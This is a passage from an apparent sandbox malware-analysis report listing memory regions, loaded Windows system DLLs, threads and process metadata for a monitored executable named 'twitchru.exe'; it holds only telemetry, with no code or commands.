entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ae0000" filename = "" Region: id = 1383 start_va = 0x4c70000 end_va = 0x606ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 1384 start_va = 0x6070000 end_va = 0x60effff entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 1385 start_va = 0x61f0000 end_va = 0x61fffff entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 1386 start_va = 0x6200000 end_va = 0x6536fff entry_point = 0x6200000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1387 start_va = 0x732c0000 end_va = 0x732ecfff entry_point = 0x732c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1388 start_va = 0x732f0000 end_va = 0x73357fff entry_point = 0x732f0000 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 1389 start_va = 0x73360000 end_va = 0x7374afff entry_point = 0x73360000 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 1390 start_va = 0x73750000 end_va = 0x737a2fff entry_point = 0x73750000 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 1391 start_va = 0x737b0000 end_va = 0x738eefff entry_point = 0x737b0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1392 start_va = 0x738f0000 end_va = 0x73974fff entry_point = 0x738f0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 1393 start_va = 0x739b0000 end_va = 0x739d0fff entry_point = 0x739b0000 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 1394 start_va = 0x739e0000 end_va = 0x73a00fff entry_point = 0x739e0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1395 start_va = 0x73d10000 end_va = 0x73d84fff entry_point = 0x73d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1396 start_va = 0x73d90000 end_va = 0x73daafff entry_point = 0x73d90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1397 start_va = 0x74030000 end_va = 0x74088fff entry_point = 0x74030000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1398 start_va = 0x74090000 end_va = 0x74099fff entry_point = 0x74090000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1399 start_va = 0x740a0000 end_va = 0x740bdfff entry_point = 0x740a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1400 start_va = 0x740e0000 end_va = 0x7422cfff entry_point = 0x740e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1401 start_va = 0x74230000 end_va = 0x743e9fff entry_point = 0x74230000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1402 start_va = 0x74580000 end_va = 0x745c2fff entry_point = 0x74580000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1403 start_va = 0x745d0000 end_va = 0x746effff entry_point = 0x745d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1404 start_va = 0x74740000 end_va = 0x7476afff entry_point = 0x74740000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1405 start_va = 0x75b90000 end_va = 0x75c1cfff entry_point = 0x75b90000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1406 start_va = 0x75e40000 end_va = 0x75efdfff entry_point = 0x75e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1407 start_va = 0x76040000 end_va = 0x760bafff entry_point = 0x76040000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1408 start_va = 0x760c0000 end_va = 0x760cbfff entry_point = 0x760c0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1409 start_va = 0x761e0000 end_va = 0x76271fff entry_point = 0x761e0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1410 start_va = 0x762d0000 end_va = 0x7637bfff entry_point = 0x762d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1411 start_va = 0x76410000 end_va = 0x76445fff entry_point = 0x76410000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1412 start_va = 0x76510000 end_va = 0x76685fff entry_point = 0x76510000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1413 start_va = 0x76870000 end_va = 0x7695ffff entry_point = 0x76870000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1414 start_va = 0x76e40000 end_va = 0x76f7ffff entry_point = 0x76e40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1415 start_va = 0x7eba0000 end_va = 0x7ec9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eba0000" filename = "" Region: id = 1416 start_va = 0x7ecc8000 end_va = 0x7eccafff entry_point = 0x0 region_type = private name = "private_0x000000007ecc8000" filename = "" Thread: id = 55 os_tid = 0x690 Thread: id = 56 os_tid = 0x438 Thread: id = 57 os_tid = 0x77c Thread: id = 58 os_tid = 0x790 Thread: id = 59 os_tid = 0x9d0 Thread: id = 60 os_tid = 0x2e0 Thread: id = 61 os_tid = 0x40 Thread: id = 62 os_tid = 0x558 Process: id = "14" image_name = "twitchru.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe" page_root = "0x7b288000" os_pid = "0x55c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x784" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " cur_dir = "C:\\Windows\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]